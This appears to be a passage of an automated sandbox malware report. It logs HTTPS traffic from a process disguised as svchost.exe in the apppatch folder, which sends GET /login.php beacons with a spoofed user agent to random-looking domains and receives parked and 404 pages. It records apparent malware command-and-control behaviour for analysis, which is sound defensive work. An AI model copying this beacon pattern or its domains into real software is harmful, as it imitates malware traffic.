                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.104973999.83.170.34437908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Etag: "lahtfw1zoc19wv"
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Server: awselb/2.0
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: Next.js
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                            Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                            Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                            Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                            Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                            Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                            Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                            Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                            Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                            Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.1049740188.114.96.34437908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC950INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyFL6VAvOnFvD1bpa9f8VdEyic%2BvDdTMGmG%2Ff6yfp2eUzAVR2fvsMKqGVEdJgJquHamRCnzfIMmKVtvLzXyhjUhto1zmOlB4yrE%2BB1YX5QpnxtM80JLE%2Fb8rS4C2GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ff9ee4a2e183d-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2149962&cwnd=250&unsent_bytes=0&cid=29c9b339551dce15&ts=1161&x=0"
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC419INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1369INData Raw: 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f
                                                                                                                                                                                                            Data Ascii: tyle><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta pro
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1369INData Raw: 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73
                                                                                                                                                                                                            Data Ascii: ion c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1369INData Raw: 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70
                                                                                                                                                                                                            Data Ascii: d"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.p
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1369INData Raw: 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f
                                                                                                                                                                                                            Data Ascii: oncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1369INData Raw: 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d
                                                                                                                                                                                                            Data Ascii: e-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-
                                                                                                                                                                                                            2024-11-11 17:24:31 UTC1369INData Raw: 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78
                                                                                                                                                                                                            Data Ascii: -webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-nex
